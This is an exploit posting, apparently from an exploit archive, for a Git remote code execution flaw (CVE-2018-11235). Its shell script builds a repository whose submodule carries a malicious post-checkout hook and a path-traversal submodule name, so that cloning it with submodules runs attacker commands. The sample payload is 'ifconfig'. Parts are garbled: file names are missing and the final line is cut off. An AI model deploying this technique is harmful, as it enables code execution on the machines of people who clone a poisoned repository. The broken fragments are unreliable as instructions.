Git Remote Code Execution

Git versions prior to 2.17.1 suffer from a code execution vulnerability.

MD5 | e695985eb1d045c6e63efc8b6523d8fa

# Exploit Title:  Git (code execution)
# Date: 2018-05-29
# Exploit Author: JameelNabbo
# Website: <>
# Vendor Homepage: <>
# CVE: CVE-2018-11235
#Version: <=2.17.1
# Tested on Kali Linux


Create two files: the file which will contain our commands to be executed the fole which contain a normal build with a bit of calls to our file

add the follwing to
cat << EOF

#here we can put our lovely commands
Exploited! : $(ifconfig)



Add the follwing to file:

set -e

#change it to any other Repo

git init "$repo_dir"
cd "$repo_dir"
git submodule add "$repo_submodule" pwned
mkdir modules
cp -r .git/modules/pwned modules
cp ../ modules/pwned/hooks/post-checkout
git config -f .gitmodules submodule.pwned.update checkout
git config -f .gitmodules --rename-section submodule.pwned submodule.../../modules/pwned
git add modules
git submodule add "$repo_submodule"
git add SmartWorm
git commit -am pwned
echo "All done, now \`git clone --recurse-submodules \"$repo_dir\" dest_dir\`a


Related Posts